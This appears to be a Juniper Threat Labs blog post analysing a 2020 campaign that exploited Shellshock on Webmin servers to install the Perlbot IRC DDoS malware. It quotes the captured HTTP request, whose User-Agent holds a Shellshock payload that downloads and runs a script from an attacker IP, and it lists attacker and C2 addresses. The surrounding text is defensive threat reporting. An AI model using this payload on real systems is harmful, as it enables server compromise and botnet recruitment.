Web servers vulnerable to CVE-2014-6271, better known as Shellshock, have long been a target for the malware known as LinuxNet Perlbot. However, Juniper Threat Labs recently observed attackers making use of this vulnerability/malware combination to attack new targets.
Shellshock is a vulnerability in GNU Bash, an extremely popular UNIX shell that is often the default shell in Linux distributions. Perlbot is a type of IRC-guided, remote code execution malware, often associated with Distributed Denial of Service (DDoS) campaigns. Attacking Shellshock-vulnerable systems with Perlbot is something of an “introduction to hacking” exercise for junior Red Team members because the relevant modules have been part of Metasploit since 2015.
A different target
The new attack approach we detected involves attackers sending an HTTPS request with an exploit payload to a TLS server operating on a victim server’s port 10000. This is an obvious attempt to compromise systems that use the Webmin web-based management package, whose default administration port is 10000.
Once the attacker has successfully compromised a system using the Shellshock vulnerability, they download and install the Perlbot malware on the victim system using the following commands:
GET / HTTP/1.0
Host: x.x.x.x:10000
User-Agent: () { :;}; /bin/bash -c “killall -9 perl;cd /tmp;curl -O http://103.89.71[.]110/root/work/m;wget http://103.89.71[.]110/root/work/m;lwp-download http://103.89.71[.]110/root/work/m;perl m; rm -rf m*”
Why Webmin as a target?
Webmin is popular amongst system administrators and users alike, as a means to remotely manage and administer computer systems. While Webmin can be installed on multiple operating systems, it is particularly popular in the Linux ecosystem and, thus, a good target for vulnerabilities like Shellshock.
Webmin has long been a popular target for attackers and the standard guidance for Webmin is, above all else, to run Webmin on a non-standard port. Ideally, access would also be restricted to specific IP addresses and HTTPS would be enabled.
When deployed in this manner, it is usually safe to use. However, Webmin is a mature and fairly complicated platform. It consists of a web server, an authentication system and a framework for configuration modules.
It is designed to be extensible and, like any such application, subject to vulnerabilities not only in its own code, but those of its modules and all the open source components that are used to package it all together to present it as a web server for consumption. As a result, older versions of Webmin are vulnerable to the Shellshock vulnerability and this allows attackers to take control of these servers.
It is unclear why this particular threat actor chose to go after a vulnerability that is not very widespread. Webmin has defaulted to automatically updates for some time now and Shellshock is an old enough vulnerability for it to be used to train junior penetration testers. In addition, according to Shodan.io, there are only a few servers exposing port 10000, meaning that most Webmin administrators are following guidance on hiding access.
Nevertheless, there are vulnerable Webmin servers out there, even if there aren’t many of them. If you wanted to use Shellshock to attack something, that cohort of out-of-date Webmin-managed Linux servers is a great target.
Anatomy of the attack
This incident is notable in part because it is exploiting Shellshock through a TLS connection (Shellshock is more likely to be unpatched on systems too old to have enabled TLS) and in part because of its origin.
The attack was detected by Juniper Threat Labs from the source IP address 103.80.18.4, which is a system known for hosting many Chinese language websites, as well as being a source of attack targeted at hadoop clusters and RDP servers.
The IRC server that the Perlbot install connects to is located at 51.195.54.178. The combination of Perlbot and Shellshock has predominantly been associated with DDoS campaigns, partially because while Shellshock provides attackers with the ability to execute arbitrary commands, they can only be executed under the user context of the compromised service.
What can an attacker do with this capability?
If a web server that is compromised is running under the Webmin user, for example, then any commands an attacker would run would be executed under the Webmin user context. Lacking an additional privilege escalation to gain root privileges, TCP and/or UDP floods are one of the only easy ways to make use of this access.
Simply because DDoSing is the easiest way to make use of a compromise where an attacker has only limited system privileges doesn’t mean it is the only way. Most applications on a Linux server operate using “ordinary”, or unprivileged, Linux users, such as Webmin. While it requires an additional privilege escalation exploit in order to gain privileged access to the compromised system, those ordinary users can still make use of a great deal of the standard GNU toolset installed on your average Linux web server.
For example, attackers can use wget to launch attacks against other web servers or make use of any of the other userspace tools or applications that the user context they’ve appropriated has access to. At the moment, we have no evidence that the attacker in question is using their access in new ways, however, the target of an HTTPS-enabled Webmin server is new.
As we wrap up this writing, the attack seems to have subsided, only occurring on July 28 and August 2, 2020. There is a possibility this was a proof of concept for something larger to come.
Special thanks to Alex Burt from Juniper Threat Labs for his help on the research around this blog.
